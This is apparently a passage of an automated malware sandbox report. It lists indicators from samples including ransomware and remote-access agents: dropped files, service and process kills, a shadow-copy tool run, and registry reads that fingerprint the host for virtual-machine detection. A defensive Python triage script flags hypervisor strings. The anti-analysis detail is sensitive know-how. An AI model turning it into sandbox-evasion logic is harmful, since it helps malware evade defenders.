C:\Windows\sysppvrdnvs.exe tdrpload.exe File opened for modification C:\Windows\sysklnorbcv.exe o.exe File opened for modification C:\Windows\FieldAnalyses InfluencedNervous.exe File opened for modification C:\Windows\AssuranceRequirements InfluencedNervous.exe File opened for modification C:\Windows\MetBlake InfluencedNervous.exe File opened for modification C:\Windows\FindingsFor InfluencedNervous.exe File opened for modification C:\Windows\OverheadSolutions InfluencedNervous.exe File opened for modification C:\Windows\NetExciting InfluencedNervous.exe File opened for modification C:\Windows\AdditionsSalvation splwow64.exe File opened for modification C:\Windows\EauOfficial splwow64.exe File opened for modification C:\Windows\ActuallyFtp splwow64.exe File created C:\Windows\sysmablsvr.exe tt.exe File opened for modification C:\Windows\BenefitBackup InfluencedNervous.exe File opened for modification C:\Windows\MeshUpdating InfluencedNervous.exe File opened for modification C:\Windows\ErikOccasionally InfluencedNervous.exe File opened for modification C:\Windows\SeasShadow InfluencedNervous.exe File opened for modification C:\Windows\TripsAstronomy ldqj18tn.exe File opened for modification C:\Windows\BibliographicHc ldqj18tn.exe File opened for modification C:\Windows\WinningNative InfluencedNervous.exe File opened for modification C:\Windows\SystemTemp chrome.exe File created C:\Windows\sysvplervcs.exe s.exe -
Launches sc.exe 15 IoCs
Sc.exe is a Windows utility to control services on the system.
pid Process 6028 sc.exe 632 sc.exe 3604 sc.exe 5332 sc.exe 5404 sc.exe 6052 sc.exe 6120 sc.exe 5640 sc.exe 2160 sc.exe 2960 sc.exe 632 sc.exe 5240 sc.exe 5260 sc.exe 5280 sc.exe 5224 sc.exe -
Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
pid Process 6620 mshta.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
Detects Pyinstaller 2 IoCs
resource yara_rule behavioral1/files/0x0029000000045358-12645.dat pyinstaller behavioral1/files/0x00260000000454b9-13718.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Program crash 6 IoCs
pid pid_target Process procid_target 4956 4532 WerFault.exe 255 8608 7900 WerFault.exe 411 9836 5920 WerFault.exe 417 3032 3768 WerFault.exe 419 4428 5012 WerFault.exe 124 9052 11476 WerFault.exe 335 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language softina.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Organizational.pif Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 132069246.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SingerJudy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language def.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language splwow64.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language meshagent32-group.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language av_downloader.exe Key opened 
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language InfluencedNervous.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language npp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language inst77player.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2750020248.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wow.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sysklnorbcv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tdrpload.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tpeinf.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CoronaVirus.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Hive%20Ransomware.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Predicted.pif Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened 
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sysmablsvr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language s.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3084722593.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language aspnet_regiis.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4434.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language buildred.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language o.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MeshAgent.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2963921430.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1713315379.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4363463463464363463463463.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
NSIS installer 2 IoCs
resource yara_rule behavioral1/files/0x00290000000451ff-370.dat nsis_installer_1 behavioral1/files/0x00290000000451ff-370.dat nsis_installer_2 -
Checks SCSI registry key(s) 3 TTPs 16 IoCs
SCSI information is often read in order to detect sandboxing environments. The device-instance paths below embed the emulator's vendor and product strings (Ven_QEMU, Prod_QEMU_DVD-ROM), which is exactly the kind of value anti-VM code compares against a list of hypervisor names. The process column shows dwm.exe, which is also the name of a legitimate Windows component, so this column alone does not show whether the reads come from the genuine Desktop Window Manager or from code running under that name.
description ioc Process
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\UpperFilters dwm.exe
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID dwm.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 dwm.exe
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\UpperFilters dwm.exe
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags dwm.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 dwm.exe
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags dwm.exe
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\UpperFilters dwm.exe
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID dwm.exe
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID dwm.exe
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID dwm.exe
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags dwm.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 dwm.exe
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags dwm.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 dwm.exe
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\UpperFilters dwm.exe
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Predicted.pif
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Organizational.pif
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Organizational.pif
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Predicted.pif
Delays execution with timeout.exe 4 IoCs
pid Process 3364 timeout.exe 1524 timeout.exe 8728 timeout.exe 3000 timeout.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 9220 WMIC.exe -
Enumerates system info in registry 2 TTPs 7 IoCs
description ioc Process
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dwm.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS dwm.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dwm.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS dwm.exe
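The three registry sections above (SCSI device identifiers, CentralProcessor\0, and the SMBIOS values under HARDWARE\DESCRIPTION\System\BIOS) are the classic hypervisor-fingerprinting reads. The script below is an added example, not part of the report or of any tool named on the page: it parses one-record-per-line IoC text of the shape shown above, groups the reads per process and flags every path that already exposes a hypervisor vendor string. The sample records are an excerpt copied from those sections; the category labels and the marker list are this example's own assumptions.

```python
"""Triage of registry-read IoCs from a sandbox report for hypervisor fingerprinting."""
import re
from collections import defaultdict

# Registry locations anti-analysis code reads to fingerprint the host.
# The labels are this example's own; the paths are the ones seen in the report.
FINGERPRINT_KEYS = {
    r"\Enum\SCSI": "storage device identifiers",
    r"\Enum\IDE": "storage device identifiers",
    r"\CentralProcessor\0": "CPU brand string",
    r"\DESCRIPTION\System\BIOS": "SMBIOS manufacturer/product/SKU",
}

# Vendor/product strings that give a hypervisor away when they appear in a
# device-instance path. Matching is case-insensitive; list is an assumption.
HYPERVISOR_MARKERS = ("QEMU", "VBOX", "VIRTUALBOX", "VMWARE", "VIRTUAL",
                      "HYPER-V", "KVM", "BOCHS", "XEN")

# Report layout: "<action> <registry path> <process>"; the process name is the
# last whitespace-separated token, so the path is matched lazily.
IOC_RE = re.compile(
    r"^(?P<action>Key value queried|Key opened)\s+(?P<path>\\REGISTRY\\.+?)\s+(?P<proc>\S+)$"
)

# Constructed input: an excerpt of the SCSI, CentralProcessor and BIOS records above,
# plus one unrelated "Key created" record that the parser must ignore.
SAMPLE_IOCS = r"""
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID dwm.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 dwm.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Predicted.pif
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Organizational.pif
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dwm.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft dwm.exe
""".strip().splitlines()


def parse_registry_iocs(lines):
    """Yield (action, path, process) for each line that has the report's record shape.
    Lines of any other shape are skipped rather than guessed at."""
    for line in lines:
        m = IOC_RE.match(line.strip())
        if m:
            yield m.group("action"), m.group("path"), m.group("proc")


def classify(path):
    """Return (fingerprint_category, hypervisor_marker) for a registry path;
    either element is None when the path carries no such signal."""
    lowered = path.lower()
    category = next((label for frag, label in FINGERPRINT_KEYS.items()
                     if frag.lower() in lowered), None)
    upper = path.upper()
    marker = next((mk for mk in HYPERVISOR_MARKERS if mk in upper), None)
    return category, marker


def triage(lines):
    """Per process: which fingerprint categories it read, how many such reads,
    and which hypervisor strings the paths exposed to it. Processes that
    touched no fingerprint key are left out of the result."""
    report = defaultdict(lambda: {"categories": set(), "markers": set(), "reads": 0})
    for _action, path, proc in parse_registry_iocs(lines):
        category, marker = classify(path)
        if category is None:
            continue
        entry = report[proc]
        entry["categories"].add(category)
        entry["reads"] += 1
        if marker:
            entry["markers"].add(marker)
    return dict(report)


if __name__ == "__main__":
    for proc, entry in sorted(triage(SAMPLE_IOCS).items()):
        print(f"{proc:20} reads={entry['reads']} categories={sorted(entry['categories'])} "
              f"hypervisor_strings={sorted(entry['markers'])}")
```

On the excerpt, dwm.exe is the only process that both reads storage identifiers and is handed a hypervisor string (QEMU) by the path itself; the CPU-string reads by the two .pif files and the SMBIOS reads by chrome.exe carry no such string. The QEMU strings are visible to the guest because the emulated CD-ROM advertises them, so the sandbox-side fix is to present non-default vendor and product strings for emulated devices.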
Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery. This section records only that vssadmin.exe ran (PID 7832) and does not show its arguments, so whether it listed, resized or deleted shadow copies cannot be determined from it; the command line, where the report records one, is what settles that.
pid Process
7832 vssadmin.exe
Kills process with taskkill 36 IoCs
pid Process 10764 taskkill.exe 2564 taskkill.exe 6940 taskkill.exe 9888 taskkill.exe 6256 taskkill.exe 7852 taskkill.exe 6276 taskkill.exe 10644 taskkill.exe 1156 taskkill.exe 2208 taskkill.exe 3160 taskkill.exe 3088 taskkill.exe 9556 taskkill.exe 11092 taskkill.exe 9172 taskkill.exe 8440 taskkill.exe 11096 taskkill.exe 10056 taskkill.exe 8136 taskkill.exe 2476 taskkill.exe 9464 taskkill.exe 5728 taskkill.exe 7068 taskkill.exe 9248 taskkill.exe 11156 taskkill.exe 11204 taskkill.exe 9632 taskkill.exe 10316 taskkill.exe 7756 taskkill.exe 1492 taskkill.exe 10324 taskkill.exe 1420 taskkill.exe 7432 taskkill.exe 5432 taskkill.exe 10292 taskkill.exe 10168 taskkill.exe -
Modifies data under HKEY_USERS 39 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E dwm.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133760995768133329" chrome.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed dwm.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft dwm.exe Key created 
\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA dwm.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry MeshAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates dwm.exe -
Modifies registry class 64 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\0 = 78003100000000005759778a1100557365727300640009000400efbe874f77486e5998b92e000000fd0100000000010000000000000000003a0000000000cd51c90055007300650072007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100380031003300000014000000 chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1226833921" chrome.exe Key created \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656} chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" chrome.exe Set value (str) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\SniffedFolderType = "Generic" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView 
= "0" chrome.exe Set value (str) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" chrome.exe Key created \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202 chrome.exe Set value (str) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell\SniffedFolderType = "Generic" chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\0\0\0 = 56003100000000005759778a12004170704461746100400009000400efbe5759778a6e5998b92e00000006090400000002000000000000000000000000000000daa1b8004100700070004400610074006100000016000000 chrome.exe Key created \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\0\0\0\0 chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0" chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local 
Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" chrome.exe Key created \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\0\0 chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\0\0\0\MRUListEx = ffffffff chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 00000000ffffffff chrome.exe Key created \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell chrome.exe Set value (str) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\SniffedFolderType = "Generic" chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\0\0\0\0 = 50003100000000006e59c0b910004c6f63616c003c0009000400efbe5759778a6e59c0b92e0000001909040000000200000000000000000000000000000080f90a004c006f00630061006c00000014000000 chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16" chrome.exe Key created \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5 chrome.exe Set value (data) 
